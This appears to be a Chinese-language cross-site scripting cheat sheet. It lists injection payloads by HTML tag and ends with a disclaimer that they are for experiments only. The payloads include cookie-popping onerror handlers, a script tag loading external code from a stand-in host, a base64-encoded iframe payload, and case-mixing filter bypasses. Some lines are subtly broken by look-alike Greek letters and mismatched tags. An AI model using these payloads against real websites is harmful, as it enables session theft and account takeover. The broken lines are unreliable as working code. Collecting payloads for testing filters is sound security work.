<img> 标签:
<img src=1 οnerrοr=alert(document.cookie)> //弹cookie
<img src=1 οnerrοr=alert(/hck/)>
<img src=1 οnerrοr=alert("hck")>
<img src=1 οnerrοr=alert(123)> //对于数字,可以不用引导
<img src="javascript:alert("xss");">
<img dynsrc="javascript:alert('xss')">
<img lowsrc="javascript:alert('xss')">
script标签:
<script>alert(1)<script>
<script src=http://xxx.com/xss.js></script> //引用外部的xss
<script> alert("hack")</script>
<script> alert(document.cookie)</script>
body 标签:
<body οnlοad=alert("xss")>
<body background="javascript:alert("xss")">
iframe 标签:
<iframe srcdoc="<img src=x οnerrοr=alert(document.domain)>"></frame> --弹ip
<iframe srcdoc="<img src=x οnerrοr=alert(1)>"></frame>
<embed src=//14.rs> ---绕过的可能性很大,
<audio controls onduratiοnchange=print(1) id=bngvse><source src=1.mp3 type=audio/mpeg></audio>
<iFrAme/src=jaVascRipt:alert.bind()(1) class=bngvse></iFramE>
<iframe srcdoc="<input onauxclick=alert(1)>" class=bngvse></iframe>
点击:
<button src=1 οnclick=alert("你好")>
<img/src=1 οnerrοr=alert(1) /> --反射型
<a href="javascript:confirm('a')" >1</a >
<iframe src= "javascript:alert('iframe')" width = "0" height = "0"/>
–!><script>prompt(1)</script>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgnYmFzZTY0X2lmcmFtZScpPC9zY3JpcHQ+">
声明:以上xss语句仅用于实验,利用以上语句对某用户、企业、业务造成影响的,一切与作者无关。